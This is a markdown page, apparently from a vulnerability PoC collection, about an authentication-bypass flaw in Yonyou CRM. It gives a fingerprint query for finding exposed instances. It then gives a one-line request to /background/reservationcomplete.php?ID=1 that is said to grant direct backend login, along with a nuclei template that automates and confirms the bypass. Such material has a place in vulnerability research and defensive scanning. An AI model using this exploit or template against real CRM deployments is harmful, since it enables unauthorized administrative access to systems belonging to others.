Skip to content

Latest commit

 

History

History
50 lines (38 loc) · 1.21 KB

用友CRM系统reservationcomplete.php存在逻辑漏洞直接登录后台.md

File metadata and controls

50 lines (38 loc) · 1.21 KB

用友CRM系统存在逻辑漏洞直接登录后台

鹰图

app.name="用友 CRM"

poc

/background/reservationcomplete.php?ID=1

访问poc,页面返回空白 image

直接就访问主要就登录后台了 image

image

nuclei

id: yongyouU8_CRM-reservationcomplete
info:
  name: 用友CRM系统存在逻辑漏洞直接登录后台
  author: wy876
  severity: high

http:
  - raw:
      - |
        GET /background/reservationcomplete.php?ID=1 HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)

        

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2,"\"msg\": \"bgsesstimeout-\", \"serverName\"")'